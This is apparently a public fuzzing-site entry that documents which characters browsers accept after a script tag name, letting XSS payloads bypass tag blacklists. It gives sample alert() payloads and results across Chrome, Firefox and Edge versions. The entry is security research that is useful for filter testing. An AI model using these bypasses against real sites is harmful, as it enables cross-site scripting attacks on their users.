Allowed characters right after tag name & before tag closure, no other characters in between
6
6
6For tag blacklist bypass, by appending character on the end of tag name
Created byhansmach1ne
Created Jan 9, 2025
Updated May 27, 2025
Detecting browser...
CategoryHTML Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
Template used:
<script$[chr]>log($[i])</script>Sample payloads
<script0x09>alert(9)</script><script
>alert(10)</script><script0x0C>alert(12)</script><script0x0D>alert(13)</script><script >alert(32)</script><script/>alert(47)</script>Fuzz results
Chrome 145.0.0.0 desktop macOS 10.15.7
Updated17 Feb 2026
Found 6 results
Loading...
Chrome 144.0.0.0 desktop Windows NT 10.0older version
Updated17 Feb 2026
Found 6 results
Loading...
Chrome 131.0.0.0 mobile Android 6.0older version
Updated9 Jan 2025
Found 6 results
Loading...
Firefox 148.0 desktop Windows NT 10.0
Updated23 Feb 2026
Found 6 results
Loading...
Firefox 147.0 desktop Linuxolder version
Updated1 Feb 2026
Found 6 results
Loading...
Firefox 128.0 desktop Linux Unknownolder version
Updated28 Oct 2025
Found 6 results
Loading...
Microsoft Edge 145.0.0.0 desktop Windows NT 10.0
Updated18 Feb 2026
Found 6 results
Loading...